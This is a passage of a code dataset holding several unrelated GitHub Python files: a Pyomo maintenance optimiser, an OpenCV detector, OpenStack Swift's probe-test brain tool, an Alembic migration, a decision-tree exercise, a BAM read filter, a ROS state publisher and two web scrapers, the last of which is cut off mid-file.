1])\n aa += uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])]\n\n if tk < n_operation - 1 and tk > 0:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = \\\n (m.x[t + 1, tj * (n_operation - 1) + tk + 1].value) * (1 - aa)\n m.u[t + 1, tj * n_operation + tk + 1] = \\\n (m.x[t + 1, tj * (n_operation - 1) + tk + 1].value) * (1 - aa)\n aa += uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])]\n\n if tk == n_operation - 1:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = 1 - aa\n m.u[t + 1, tj * n_operation + tk + 1] = 1 - aa\n\n\n uu0 = uu[t * n_operation * n_condition : (t+1) * n_operation * n_condition]\n\n\n for ti in m.n_condition:\n ss0[t+1, :] += ((ss0[t, ti] * uu0[ti * n_operation : (ti + 1) * n_operation]).dot(con_m_performance[ti, :])).dot(degradeP)\n m.costi[t + 1] = value(m.costi[t + 1]) + N * uu0[ti * n_operation : (ti + 1) * n_operation].dot(maintenance_cost[:, ti])\n \n if ss0[t+1, n_condition-1] > 0.05:\n m.costi[t + 1] = value(m.costi[t + 1]) + 1e15\n \n for j in range(n_condition):\n m.ii[t+1, j+1] = ss0[t+1, j]\n\n return m.ii[t+1, n_condition] == ss0[t+1, n_condition-1]\n\nmodel.action = Constraint(model.T, rule=time_action)\n\n\ndef last_condition(m, t):\n m.iii[t + 1] = m.ii[t+1, n_condition].value\n return m.iii[t + 1] -0.05 <= 0\n\nmodel.last_con = Constraint(model.T, rule=last_condition)\n#model.last_con_ct = Constraint(model.T, rule=last_condition_const)\n\n\n# define the cost function\ndef obj_rule(m):\n return sum(m.costi[ti + 1] for ti in m.T)\n\nmodel.obj = Objective(rule=obj_rule)\n\n# solve the problem\nimport cplex\nimport sys\nsys.path.append('/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-84_linux')\nsolver = SolverFactory('cplex', executable = \"/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux/cplex\")#('glpk')\nsolution = solver.solve(model) #, executable = \"/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux/cplex\")\nmodel.action.pprint()\nmodel.last_con.pprint()\n\nfrom pyomo.opt import SolverStatus, TerminationCondition\nif (solution.solver.status == SolverStatus.ok) and (solution.solver.termination_condition == TerminationCondition.optimal):\n print(\"Solution is feasible and optimal\")\n print(\"Objective function value = \", model.obj())\nelif solution.solver.termination_condition == TerminationCondition.infeasible:\n print (\"Failed to find solution.\")\nelse:\n # something else is wrong\n print(str(solution.solver))\n# print the results\nfor t in model.T:\n #print(model.x[2, 3].value)\n print('Period: {0}, Prod. Amount: {1}'.format(t, uu[np.ravel_multi_index([t, 0], [TT, n_operation * n_condition]): (np.ravel_multi_index([t, n_operation * n_condition-1], [TT, n_operation * n_condition])+1)]))","repo_name":"Jueming6/LPRT","sub_path":"pyomo_maintenance.py","file_name":"pyomo_maintenance.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5820012277","text":"import imutils\r\nimport numpy as np\r\nimport cv2 as cv\r\nfrom imutils.object_detection import non_max_suppression\r\n\r\n\r\nfrom Models.CallProvider import CallProvider\r\nfrom Models.Connections import FramesConnection\r\n\r\n\r\nclass Detector:\r\n __classifier = None\r\n class_detection = \"\"\r\n n_frames = 20\r\n\r\n def getRects(self, frame):\r\n return []\r\n\r\n def showFrame(self, frame):\r\n frame = imutils.resize(frame)\r\n cv.imshow(\"Detector\", frame)\r\n cv.waitKey(1)\r\n\r\n def find(__db_frames):\r\n\r\n # class which permit to save frames\r\n f = FramesConnection()\r\n\r\n # class which call directly the phones of clients in case of detection\r\n cp = CallProvider()\r\n\r\n # variable which\r\n one_shot = True\r\n\r\n # open the cam in read mode\r\n cap = cv.VideoCapture(0, cv.CAP_DSHOW)\r\n # counter of consecutive faces detected in the frames\r\n i = 0\r\n\r\n while True:\r\n ret, frame = cap.read()\r\n\r\n # no frames stop\r\n if not ret:\r\n break\r\n\r\n # transformation from RGB to Gray chanel\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n\r\n rect = __db_frames.getRects(frame)\r\n\r\n for (x, y, w, h) in rect:\r\n # put the rectangles in the image\r\n cv.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n # put the text in the frames\r\n cv.putText(frame, __db_frames.class_detection, (x, y - 10), cv.FONT_ITALIC, 0.9, (36, 255, 12), 2)\r\n\r\n # count the number of faces detected\r\n n_face = len(rect)\r\n i += 1\r\n\r\n # reset false positive face\r\n if n_face == 0:\r\n i = 0\r\n\r\n if i > __db_frames.n_frames:\r\n #cp.doCall()\r\n i = 0\r\n\r\n # check if there are faces\r\n is_face = (n_face > 0)\r\n\r\n # post the frames\r\n if is_face and one_shot:\r\n # TODO: find the correct format of frames for mongoDB\r\n f.post(\"face\", is_face)\r\n one_shot = False\r\n\r\n __db_frames.showFrame(frame)\r\n\r\n\r\nclass DetectorFace(Detector):\r\n class_detection = \"Face\"\r\n path_mask = 'rsc/haarcascade_frontalface_default.xml'\r\n\r\n def __init__(self, scale_factor=1.1, min_neighbors=5):\r\n self.__classifier = cv.CascadeClassifier(self.path_mask)\r\n self.scale_factor = scale_factor\r\n self.min_neighbors = min_neighbors\r\n\r\n def getRects(self, frame):\r\n return self.__classifier.detectMultiScale(frame, self.scale_factor, self.min_neighbors)\r\n\r\n\r\nclass DetectorPedestrian(Detector):\r\n class_detection = \"Pedestrian\"\r\n\r\n def __init__(self, win_stride=(4, 4), padding=(8, 8), scale=1.05, probs=None, overlap_thresholding=0.50):\r\n self.__classifier = cv.HOGDescriptor()\r\n self.__classifier.setSVMDetector(cv.HOGDescriptor_getDefaultPeopleDetector())\r\n self.win_stride = win_stride\r\n self.padding = padding\r\n self.scale = scale\r\n self.probs = probs\r\n self.overlap_trasholding = overlap_thresholding\r\n\r\n def getRects(self, frame):\r\n # detect people in the gray frame\r\n rects, _ = self.__classifier.detectMultiScale(frame, winStride=self.win_stride, padding=self.padding,\r\n scale=self.scale)\r\n\r\n # apply non-maxima suppression to the bounding boxes using a\r\n # fairly large overlap threshold to try to maintain overlapping\r\n # boxes that are still people\r\n rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\r\n pick = non_max_suppression(rects, probs=self.probs, overlapThresh=self.overlap_trasholding)\r\n return pick\r\n","repo_name":"GianfilippoBellin/raspberryPi-faceAlarm","sub_path":"Models/Detectors.py","file_name":"Detectors.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9388875559","text":"#!/usr/bin/python -u\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom __future__ import print_function\nimport functools\nimport sys\nfrom io import BytesIO\nimport itertools\nimport uuid\nfrom optparse import OptionParser\nimport random\n\nimport six\nfrom six.moves.urllib.parse import urlparse, parse_qs, quote\n\nfrom swift.common.manager import Manager\nfrom swift.common import utils, ring\nfrom swift.common.internal_client import InternalClient, UnexpectedResponse\nfrom swift.common.storage_policy import POLICIES\nfrom swift.common.http import HTTP_NOT_FOUND\n\nfrom swiftclient import client, get_auth, ClientException\n\nfrom test.probe import PROXY_BASE_URL\nfrom test.probe.common import ENABLED_POLICIES\n\nTIMEOUT = 60\n\n\ndef meta_command(name, bases, attrs):\n \"\"\"\n Look for attrs with a truthy attribute __command__ and add them to an\n attribute __commands__ on the type that maps names to decorated methods.\n The decorated methods' doc strings also get mapped in __docs__.\n\n Also adds a method run(command_name, *args, **kwargs) that will\n execute the method mapped to the name in __commands__.\n \"\"\"\n commands = {}\n docs = {}\n for attr, value in attrs.items():\n if getattr(value, '__command__', False):\n commands[attr] = value\n # methods always have a __doc__ attribute, sometimes empty\n docs[attr] = (getattr(value, '__doc__', None) or\n 'perform the %s command' % attr).strip()\n attrs['__commands__'] = commands\n attrs['__docs__'] = docs\n\n def run(self, command, *args, **kwargs):\n return self.__commands__[command](self, *args, **kwargs)\n attrs.setdefault('run', run)\n return type(name, bases, attrs)\n\n\ndef command(f):\n f.__command__ = True\n return f\n\n\n@six.add_metaclass(meta_command)\nclass BaseBrain(object):\n def _setup(self, account, container_name, object_name,\n server_type, policy):\n self.account = account\n self.container_name = container_name\n self.object_name = object_name\n server_list = ['%s-server' % server_type] if server_type else ['all']\n self.servers = Manager(server_list)\n policies = list(ENABLED_POLICIES)\n random.shuffle(policies)\n self.policies = itertools.cycle(policies)\n\n o = object_name if server_type == 'object' else None\n c = container_name if server_type in ('object', 'container') else None\n if server_type in ('container', 'account'):\n if policy:\n raise TypeError('Metadata server brains do not '\n 'support specific storage policies')\n self.policy = None\n self.ring = ring.Ring(\n '/etc/swift/%s.ring.gz' % server_type)\n elif server_type == 'object':\n if not policy:\n raise TypeError('Object BrainSplitters need to '\n 'specify the storage policy')\n self.policy = policy\n policy.load_ring('/etc/swift')\n self.ring = policy.object_ring\n else:\n raise ValueError('Unknown server_type: %r' % server_type)\n self.server_type = server_type\n\n self.part, self.nodes = self.ring.get_nodes(self.account, c, o)\n\n self.node_numbers = [n['id'] + 1 for n in self.nodes]\n if 1 in self.node_numbers and 2 in self.node_numbers:\n self.primary_numbers = (1, 2)\n self.handoff_numbers = (3, 4)\n else:\n self.primary_numbers = (3, 4)\n self.handoff_numbers = (1, 2)\n\n @command\n def start_primary_half(self):\n \"\"\"\n start servers 1 & 2\n \"\"\"\n tuple(self.servers.start(number=n) for n in self.primary_numbers)\n\n @command\n def stop_primary_half(self):\n \"\"\"\n stop servers 1 & 2\n \"\"\"\n tuple(self.servers.stop(number=n) for n in self.primary_numbers)\n\n @command\n def start_handoff_half(self):\n \"\"\"\n start servers 3 & 4\n \"\"\"\n tuple(self.servers.start(number=n) for n in self.handoff_numbers)\n\n @command\n def stop_handoff_half(self):\n \"\"\"\n stop servers 3 & 4\n \"\"\"\n tuple(self.servers.stop(number=n) for n in self.handoff_numbers)\n\n @command\n def put_container(self, policy_index=None):\n \"\"\"\n put container with next storage policy\n \"\"\"\n\n if policy_index is not None:\n policy = POLICIES.get_by_index(int(policy_index))\n if not policy:\n raise ValueError('Unknown policy with index %s' % policy)\n elif not self.policy:\n policy = next(self.policies)\n else:\n policy = self.policy\n\n headers = {'X-Storage-Policy': policy.name}\n self.client.put_container(self.container_name, headers=headers)\n\n @command\n def delete_container(self):\n \"\"\"\n delete container\n \"\"\"\n self.client.delete_container(self.container_name)\n\n @command\n def put_object(self, headers=None, contents=None):\n \"\"\"\n issue put for test object\n \"\"\"\n self.client.put_object(self.container_name, self.object_name,\n headers=headers, contents=contents)\n\n @command\n def delete_object(self):\n \"\"\"\n issue delete for test object\n \"\"\"\n self.client.delete_object(self.container_name, self.object_name)\n\n @command\n def get_object(self):\n \"\"\"\n issue GET for test object\n \"\"\"\n return self.client.get_object(self.container_name, self.object_name)\n\n\nclass PublicBrainClient(object):\n def __init__(self, url, token):\n self.url = url\n self.token = token\n self.account = utils.split_path(urlparse(url).path, 2, 2)[1]\n\n def put_container(self, container_name, headers):\n return client.put_container(self.url, self.token, container_name,\n headers=headers)\n\n def post_container(self, container_name, headers):\n return client.post_container(self.url, self.token, container_name,\n headers)\n\n def delete_container(self, container_name):\n return client.delete_container(self.url, self.token, container_name)\n\n def put_object(self, container_name, object_name, headers, contents,\n query_string=None):\n return client.put_object(self.url, self.token, container_name,\n object_name, headers=headers,\n contents=contents, query_string=query_string)\n\n def delete_object(self, container_name, object_name):\n try:\n client.delete_object(self.url, self.token,\n container_name, object_name)\n except ClientException as err:\n if err.http_status != HTTP_NOT_FOUND:\n raise\n\n def head_object(self, container_name, object_name):\n return client.head_object(self.url, self.token, container_name,\n object_name)\n\n def get_object(self, container_name, object_name, query_string=None):\n return client.get_object(self.url, self.token,\n container_name, object_name,\n query_string=query_string)\n\n\ndef translate_client_exception(m):\n @functools.wraps(m)\n def wrapper(*args, **kwargs):\n try:\n return m(*args, **kwargs)\n except UnexpectedResponse as err:\n raise ClientException(\n err.args[0],\n http_scheme=err.resp.environ['wsgi.url_scheme'],\n http_host=err.resp.environ['SERVER_NAME'],\n http_port=err.resp.environ['SERVER_PORT'],\n http_path=quote(err.resp.environ['PATH_INFO']),\n http_query=err.resp.environ['QUERY_STRING'],\n http_status=err.resp.status_int,\n http_reason=err.resp.explanation,\n http_response_content=err.resp.body,\n http_response_headers=err.resp.headers,\n )\n return wrapper\n\n\nclass InternalBrainClient(object):\n\n def __init__(self, conf_file, account='AUTH_test'):\n self.swift = InternalClient(conf_file, 'probe-test', 3)\n self.account = account\n\n @translate_client_exception\n def put_container(self, container_name, headers):\n return self.swift.create_container(self.account, container_name,\n headers=headers)\n\n @translate_client_exception\n def post_container(self, container_name, headers):\n return self.swift.set_container_metadata(self.account, container_name,\n headers)\n\n @translate_client_exception\n def delete_container(self, container_name):\n return self.swift.delete_container(self.account, container_name)\n\n def parse_qs(self, query_string):\n if query_string is not None:\n return {k: v[-1] for k, v in parse_qs(query_string).items()}\n\n @translate_client_exception\n def put_object(self, container_name, object_name, headers, contents,\n query_string=None):\n return self.swift.upload_object(BytesIO(contents), self.account,\n container_name, object_name,\n headers=headers,\n params=self.parse_qs(query_string))\n\n @translate_client_exception\n def delete_object(self, container_name, object_name):\n return self.swift.delete_object(\n self.account, container_name, object_name)\n\n @translate_client_exception\n def head_object(self, container_name, object_name):\n return self.swift.get_object_metadata(\n self.account, container_name, object_name)\n\n @translate_client_exception\n def get_object(self, container_name, object_name, query_string=None):\n status, headers, resp_iter = self.swift.get_object(\n self.account, container_name, object_name,\n params=self.parse_qs(query_string))\n return headers, b''.join(resp_iter)\n\n\nclass BrainSplitter(BaseBrain):\n def __init__(self, url, token, container_name='test', object_name='test',\n server_type='container', policy=None):\n self.client = PublicBrainClient(url, token)\n self._setup(self.client.account, container_name, object_name,\n server_type, policy)\n\n\nclass InternalBrainSplitter(BaseBrain):\n def __init__(self, conf, container_name='test', object_name='test',\n server_type='container', policy=None):\n self.client = InternalBrainClient(conf)\n self._setup(self.client.account, container_name, object_name,\n server_type, policy)\n\n\nparser = OptionParser('%prog [options] '\n '[:[,...]] [...]')\nparser.usage += '\\n\\nCommands:\\n\\t' + \\\n '\\n\\t'.join(\"%s - %s\" % (name, doc) for name, doc in\n BrainSplitter.__docs__.items())\nparser.add_option('-c', '--container', default='container-%s' % uuid.uuid4(),\n help='set container name')\nparser.add_option('-o', '--object', default='object-%s' % uuid.uuid4(),\n help='set object name')\nparser.add_option('-s', '--server_type', default='container',\n help='set server type')\nparser.add_option('-P', '--policy_name', default=None,\n help='set policy')\n\n\ndef main():\n options, commands = parser.parse_args()\n if not commands:\n parser.print_help()\n return 'ERROR: must specify at least one command'\n for cmd_args in commands:\n cmd = cmd_args.split(':', 1)[0]\n if cmd not in BrainSplitter.__commands__:\n parser.print_help()\n return 'ERROR: unknown command %s' % cmd\n url, token = get_auth(PROXY_BASE_URL + '/auth/v1.0',\n 'test:tester', 'testing')\n if options.server_type == 'object' and not options.policy_name:\n options.policy_name = POLICIES.default.name\n if options.policy_name:\n options.server_type = 'object'\n policy = POLICIES.get_by_name(options.policy_name)\n if not policy:\n return 'ERROR: unknown policy %r' % options.policy_name\n else:\n policy = None\n brain = BrainSplitter(url, token, options.container, options.object,\n options.server_type, policy=policy)\n for cmd_args in commands:\n parts = cmd_args.split(':', 1)\n command = parts[0]\n if len(parts) > 1:\n args = utils.list_from_csv(parts[1])\n else:\n args = ()\n try:\n brain.run(command, *args)\n except ClientException as e:\n print('**WARNING**: %s raised %s' % (command, e))\n print('STATUS'.join(['*' * 25] * 2))\n brain.servers.status()\n sys.exit()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"openstack/swift","sub_path":"test/probe/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":13515,"program_lang":"python","lang":"en","doc_type":"code","stars":2518,"dataset":"github-code","pt":"39"} +{"seq_id":"35997209613","text":"\"\"\"add sername\n\nRevision ID: 95c9c965f366\nRevises: f6eda7049057\nCreate Date: 2023-01-25 13:13:56.030336\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '95c9c965f366'\ndown_revision = 'f6eda7049057'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('author_model', schema=None) as batch_op:\n batch_op.add_column(sa.Column('surname', sa.String(length=32), server_default='ivanov', nullable=True))\n\n with op.batch_alter_table('quote_model', schema=None) as batch_op:\n batch_op.add_column(sa.Column('rating', sa.Integer(), server_default='1', nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('quote_model', schema=None) as batch_op:\n batch_op.drop_column('rating')\n\n with op.batch_alter_table('author_model', schema=None) as batch_op:\n batch_op.drop_column('surname')\n\n # ### end Alembic commands ###\n","repo_name":"EvgeniDorofeevskiy/flask2","sub_path":"migrations/versions/95c9c965f366_add_sername.py","file_name":"95c9c965f366_add_sername.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70159971633","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.tree import DecisionTreeClassifier, plot_tree, export_graphviz, export_text\n\n\ntrain = pd.read_excel('data/lendingclubtraindata.xlsx')\nvalidation=pd.read_excel('data/lendingclubvaldata.xlsx')\ntest=pd.read_excel('data/lendingclubtestdata.xlsx')\n\n\n# store target column\ny_train = train['loan_status']\ny_val=validation['loan_status']\ny_test=test['loan_status']\n\n# exercise 1\nprob_1=len(y_train[y_train==1])/len(y_train)\nprob_2=1.0-prob_1\nprint(\"Initial entropy=\",-prob_1*np.log2(prob_1)-prob_2*np.log2(prob_2))\n\n# exercise 2\n# From the dataset we have that 60.40% own their home and 39.60% rent.\nhome_owners=train[train.home_ownership==1]\nhome_owner_prob=len(home_owners)/len(y_train)\nprint('prob own home=',home_owner_prob)\n# Loans were fully paid for 81.72 % of those who owned their home\nhome_owners_paid=home_owners[home_owners.loan_status==1]\nprob_home_owner_paid=len(home_owners_paid)/len(home_owners)\nprint('prob own home and paid =',prob_home_owner_paid)\n\n# 75.29% of those who rented paid their loans\nhome_rent=train[train.home_ownership==0]\nhome_rent_paid=home_rent[home_rent.loan_status==1]\nprob_home_rent_paid=len(home_rent_paid)/len(home_rent)\nprint('prob own rent and paid =',prob_home_rent_paid)\n\n# , the entropy is\n# 0.6040(−0.8172 ln(0.8172) − 0.1828 ln(0.1828))\n# + 0.3960(−0.7529 ln(0.7529) − 0.2471 ln(0.2471)) = 0.7339\n# So the reduction in entropy if we use this feature is 0.7382 − 0.7339 = 0.0043\n\n# exercise 3\n\n# remove target column to create feature only dataset\nX_train = train.drop('loan_status',axis=1)\nX_val=validation.drop('loan_status',axis=1)\nX_test=test.drop('loan_status',axis=1)\n\n\nclf = DecisionTreeClassifier(criterion='entropy',max_depth=4,min_samples_split=1000,min_samples_leaf=200,random_state=0)\nclf = clf.fit(X_train,y_train)\n# fig, ax = plt.subplots(figsize=(40, 30))\n# plot_tree(clf, filled=True, feature_names=X_train.columns, proportion=True)\n# plt.show()\n\ntrain_score=clf.score(X_train,y_train)\ntest_score=clf.score(X_test,y_test)\n\nprint('train_score=',train_score)\nprint('test_score=',test_score)\n","repo_name":"eightsmile/cqf","sub_path":"Module4/Lec6_DecisionTree/CQF_January_2023_M4L6_Solutions-1/loanclub.py","file_name":"loanclub.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"39"} +{"seq_id":"8971398385","text":"import dr_tools, sys, pysam\nimport os, argparse\nfrom joblib import Parallel, delayed\nsys.path.insert(0, '../src')\nimport GenomeFetch\n\n\"\"\"\nThis script removes reads when 3' has TGG on the genome\nWorks for smallrna star folder. aka max32, max38\n\n>adapter_three_prime\nTGGAATTCTCGGGTGCCAAGG\n>polyA\nAAAAAAAAAAAAA\n\"\"\"\n\ndef safe_mkdir(path):\n\tif not os.path.exists(path):\n\t\tos.mkdir(path)\n\t\tos.chmod(path, 0o774)\n\ndef remove_reads_from_precursor(inbam):\n\n\t\"\"\"\n\tprepare input/output files\n\t\"\"\"\n\tinbamPysamObj = pysam.Samfile(inbam, \"rb\" )\n\tp = inbam.split(\"/\")\n\toutbamTmp = \"/\".join(p[:-3]+[o.outstardir]+p[-2:])\n\tbam_out = \".\".join(outbamTmp.split(\".\")[:-1]) + \"_tmp.bam\"\n\tbam_out_sorted = \".\".join(outbamTmp.split(\".\")[:-1])\n\toutbam = pysam.Samfile(bam_out, \"wb\", template=inbamPysamObj)\n\n\t\"\"\"\n\tcreate genome fetch object\n\t\"\"\"\n\tgf = GenomeFetch.GenomeFetch(genomedir=o.genome_dir)\n\n\t\"\"\"\n\tremove reads when 3' has TGG on the genome\n\t\"\"\"\n\tfor read in inbamPysamObj:\n\t\tread_name = read.qname\n\t\ttid = read.rname\n\t\treadchr = inbamPysamObj.getrname(tid)\n\t\treadstart = int(read.pos) + 1\n\t\treadend = read.aend\n\t\tstrand = read.flag\n\t\treadlen = len(read.seq) #this is the actual read length (41M, means readlen=41)\n\t\tread_len = read.qlen #this only considers matches (8S30M, means read_len=30)\n\t\tminRlen = o.minRlen\n\t\tif readlen <= o.readlen_cutoff:\n\t\t\toutbam.write(read)\n\t\t\tcontinue\n\t\t\n\t\tif strand ==0: #read maps to forward strand\n\t\t\tupperlimit = minRlen - readlen\n\t\t\tbpwindow = gf.get_seq_from_to(readchr, readend+1, readend+upperlimit)\n\t\t\tif readlen==minRlen-1 and (bpwindow == \"T\" or bpwindow == \"A\"): continue #TGGAATTCTCGGGTGCCAAGG\n\t\t\telif readlen==minRlen-2 and (bpwindow == \"TG\" or bpwindow == \"AA\"): continue\n\t\t\telif readlen==minRlen-3 and (bpwindow == \"TGG\" or bpwindow == \"AAA\"): continue\n\t\t\telif readlen==minRlen-4 and (bpwindow == \"TGGA\" or bpwindow == \"AAAA\"): continue\n\t\t\telif readlen==minRlen-5 and (bpwindow == \"TGGAA\" or bpwindow == \"AAAAA\"): continue\n\t\t\telse: outbam.write(read)\n\n\t\telif strand ==16: #read maps to reverse strand\n\t\t\tupperlimit = minRlen - readlen\n\t\t\tbpwindow = gf.get_seq_from_to(readchr, readstart-upperlimit, readstart-1)\n\t\t\tif readlen==minRlen-1 and (bpwindow == \"A\" or bpwindow == \"T\"): continue #TTCCA\n\t\t\telif readlen==minRlen-2 and (bpwindow == \"CA\" or bpwindow == \"TT\"): continue\n\t\t\telif readlen==minRlen-3 and (bpwindow == \"CCA\" or bpwindow == \"TTT\"): continue\n\t\t\telif readlen==minRlen-4 and (bpwindow == \"TCCA\" or bpwindow == \"TTTT\"): continue\n\t\t\telif readlen==minRlen-5 and (bpwindow == \"TTCCA\" or bpwindow == \"TTTTT\"): continue\n\t\t\telse: outbam.write(read)\n\n\toutbam.close()\n\t#sort and index the final bam file\n\tpysam.sort(bam_out, bam_out_sorted)\t\n\tpysam.index(bam_out_sorted+\".bam\", template=inbamPysamObj)\n\tos.remove(bam_out)\n\n#main function\nif '__main__' == __name__:\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-i', '--instardir', required=True)\n\tparser.add_argument('-o', '--outstardir', required=True)\n\tparser.add_argument('-g', '--genome_dir', default=\"path_to_reference_genome\")\n\tparser.add_argument('-c', '--readlen_cutoff', default=35)\n\tparser.add_argument('-x', '--minRlen', default=41, type=int) #minimum read length to define a precursor\n\tparser.add_argument('-p', '--numCPU', default=20, type=int)\n\to = parser.parse_args()\n\n\tif not os.path.exists(o.outstardir): safe_mkdir(o.outstardir)\n\n\tsample_names = os.listdir(o.instardir)\n\tsamplenames_with_fullpath = []\n\tfor sample in sample_names:\n\t\t##prepare input files\n\t\tbam = os.path.join(o.instardir, sample, \"%s.bam\" %sample)\n\t\tsamplenames_with_fullpath.append(bam)\n\n\t\tpath_outbam = os.path.join(o.outstardir, sample)\n\t\tif not os.path.exists(path_outbam): safe_mkdir(path_outbam)\n\n\tParallel(n_jobs=o.numCPU)(delayed(remove_reads_from_precursor)(sample) for sample in samplenames_with_fullpath)\n\n","repo_name":"eyay/smallseq","sub_path":"src/remove_reads_with_genomic_TGG.py","file_name":"remove_reads_with_genomic_TGG.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"43564886608","text":"#!/usr/bin/env python\n#\n# Gets robot state and publishes as tf transform\nimport rospy\nfrom tf2_ros import TFMessage\nfrom sensor_msgs.msg import JointState\nimport argparse\nimport rbd_spot\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Publish Spot RobotState as TF messages\")\n parser.add_argument(\"--root-frame\", type=str, help=\"The name of the root frame of the TF tree\",\n default=\"body\")\n args, _ = parser.parse_known_args()\n\n rospy.init_node(\"spot_state_tf_publisher\")\n conn = rbd_spot.SpotSDKConn(sdk_name=\"StateTFPublisher\")\n robot_state_client = rbd_spot.state.create_client(conn)\n tf_pub = rospy.Publisher('/tf', TFMessage, queue_size=10)\n js_pub = rospy.Publisher('/joint_states', JointState, queue_size=10)\n\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n state = rbd_spot.state.getRobotState(robot_state_client)\n tf_msg = rbd_spot.state.get_tf_from_state(state, conn, args.root_frame)\n js_msg = rbd_spot.state.get_joint_state_from_state(state, conn)\n\n tf_pub.publish(tf_msg)\n js_pub.publish(js_msg)\n print(\"published\")\n rate.sleep()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zkytony/robotdev","sub_path":"spot/ros_ws/src/rbd_spot_robot/scripts/state_publisher.py","file_name":"state_publisher.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"22866323765","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef get_bs_obj(company_code):\r\n url = \"https://finance.naver.com/item/main.nhn?code=\" + company_code\r\n result = requests.get(url)\r\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\r\n return bs_obj\r\n\r\n# bs_obj를 받아서 price를 return하게\r\ndef get_price(company_code):\r\n bs_obj = get_bs_obj(company_code)\r\n no_today = bs_obj.find(\"p\", {\"class\": \"no_today\"})\r\n blind_now = no_today.find(\"span\", {\"class\": \"blind\"})\r\n return blind_now.text\r\n\r\n# bs_obj를 받아서 candle_chart_data를 return하게\r\ndef get_candle_chart_data(company_code):\r\n bs_obj = get_bs_obj(company_code)\r\n td_first = bs_obj.find(\"td\", {\"class\":\"first\"})\r\n blind = td_first.find(\"span\", {\"class\":\"blind\"})\r\n\r\n #close 종가(전일)\r\n close = blind.text\r\n\r\n return close\r\n\r\n# samsung 005930\r\n# naver 035420\r\n# kakao 035720\r\ncompany_codes = [\"005930\", \"035420\", \"035720\"]\r\nfor item in company_codes:\r\n price = get_price(item)\r\n close = get_candle_chart_data(item)\r\n print(price, close)\r\n\r\n\r\n\r\n\r\n","repo_name":"ehdalseorka1/crowling","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5675295109","text":"#Automation Package\nfrom playwright.sync_api import sync_playwright\nimport time\n#Scraping Package\nfrom selectolax.parser import HTMLParser\nfrom bs4 import BeautifulSoup as bs\n#Preprosscsing Package\nimport pandas as pd\nimport numpy as np\nimport re\nfrom datetime import datetime as dt\nimport json\nimport os\n##################################################\n#Create Automating Page\nwith sync_playwright() as playwright:\n #Launch the browser and go to the page\n browser = playwright.chromium.launch(headless=False , slow_mo=200)\n page = browser.new_page()\n page.set_viewport_size({'width':1920,'height':1080})\n page.goto('https://www.glassdoor.com/Job',wait_until='domcontentloaded')\n\n\n\n #Adjust Resarch Job and Filters\n page.get_by_placeholder('Find your perfect job').type('Data Analyst',delay=200) #Write Data Analyst in job research\n page.locator('div input[value=\"Data Analyst\"]').press('Enter') #Press Enter\n page.wait_for_timeout(2000) # Wait for several milliseconds\n page.locator(\"div[class*='job-search'] input[placeholder='Location']\").type('Remote',delay=200)#Write Remote in location research\n page.locator(\"div[class*='job-search'] input[placeholder='Location']\").press('ArrowDown+Enter')#Press Arrow Down Enter to choose the first result\n page.wait_for_timeout(1000) # Wait for several milliseconds\n page.locator(\"div > [data-test='DATEPOSTED']:visible\").click() #Click in Dateposted to make it visible\n # If Last 3 Days not found\n try:\n page.locator(\"button[value='3']\").click() # Choose the Last 3 Days\n except:\n page.locator(\"button[value='1']\").click() # Choose the last 3 Days\n page.wait_for_timeout(1000) # # Wait for several milliseconds\n page.locator(\"div [data-test='sort-by-header']:visible\").click()# Make sort header visible\n page.wait_for_timeout(1000) # # Wait for several milliseconds\n page.get_by_role('button',name='Recent').click() # Sort by recent res\n\n page.wait_for_selector(\"li[class*='react-job-listing']\") # Wait for 